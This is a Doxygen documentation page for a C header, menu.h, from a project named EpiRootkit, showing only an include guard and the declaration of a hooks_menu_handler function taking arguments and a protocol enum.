EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
menu.h
Go to the documentation of this file.
1// interceptor/core/menu.h
2#ifndef HOOKS_MENU_H
3#define HOOKS_MENU_H
4
5#include "config.h"
6
14int hooks_menu_handler(char *args, enum Protocol protocol);
15
16#endif // HOOKS_MENU_H
Protocol
Definition config.h:28
int hooks_menu_handler(char *args, enum Protocol protocol)
Definition menu.c:289